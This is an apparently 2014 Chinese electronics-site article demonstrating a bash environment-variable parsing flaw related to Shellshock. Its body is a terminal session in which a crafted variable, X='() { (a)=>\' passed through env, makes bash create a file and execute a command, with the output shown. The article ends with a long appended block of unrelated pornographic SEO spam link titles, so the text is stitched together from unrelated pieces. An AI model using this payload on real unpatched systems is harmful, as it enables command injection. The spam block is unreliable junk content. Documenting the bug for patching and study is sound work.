《電子技術應用》
您所在的位置:首頁 > 嵌入式技術 > 設計應用 > 一個linux下的bash安全漏洞
一個linux下的bash安全漏洞
摘要:
關鍵詞: bash 09 2014 2713 david davidcchen
Abstract:
Key words :

 1. 通過設置一個特殊的環境變量的env,能間接地查到到linux命令的屬性,如下:

  [2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

  ls: cannot access date: No such file or directory

  [2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>\' bash -c 'date'

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  [2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date

  -rw-rw-r--. 1 david david 0 Sep 27 13:01 date

  [2014-09-27 13:01:27 david@davidcchen ~]$

  2. 一次運行環境變量。

  [2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version

  zsh 4.3.10 (x86_64-redhat-linux-gnu)

  [2014-09-27 13:03:24 david@davidcchen ~]$ bash --version

  GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)

  Copyright (C) 2009 Free Software Foundation, Inc.

  License GPLv3+: GNU GPL version 3 or later

  This is free software; you are free to change and redistribute it.

  There is NO WARRANTY, to the extent permitted by law.

  [2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\' bash -c "echo date"; cat echo; rm echo

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  Sat Sep 27 13:03:52 CST 2014

  ---------->成功運行date命令

此內容為AET網站原創,未經授權禁止轉載。
主站蜘蛛池模板: 欧美三级不卡在线观看视频 | 久久久久国色AV免费观看性色| 男人插女人网站| 国产女主播一区| 99久久综合狠狠综合久久| 日本三级在线观看免费| 国产特级淫片免费看| 一本大道在线无码一区| 特黄特黄一级高清免费大片| 国产高清在线精品一区| 亚洲sss综合天堂久久久| 精品人人妻人人澡人人爽人人| 国产成人麻豆亚洲综合无码精品 | 宝贝过来趴好张开腿让我看看 | 亚洲国产欧美日韩精品小说| 精品国产AV无码一区二区三区| 在线播放第一页| 久久97久久97精品免视看秋霞| 欧美人与性动交α欧美精品| 免费污网站在线观看| 黄页网址免费大全观看| 国产高清视频在线| 一本色道久久88加勒比—综合| 日韩欧美综合在线| 亚洲日韩中文字幕| 男生和女生一起差差差差| 国产乱女乱子视频在线播放| 亚洲自国产拍揄拍| 在线观看国产成人AV天堂| 上原瑞穗最全番号| 日本边添边摸边做边爱边| 免费视频中文字幕| 香蕉网站在线观看| 国产精品毛片一区二区三区| www.嫩草影院| 抱着cao才爽| 五月天国产视频| 欧美精品久久久久久久自慰| 公粗一晚六次挺进我密道视频| 蜜芽.768.忘忧草二区老狼| 国产日韩一区二区三区在线观看 |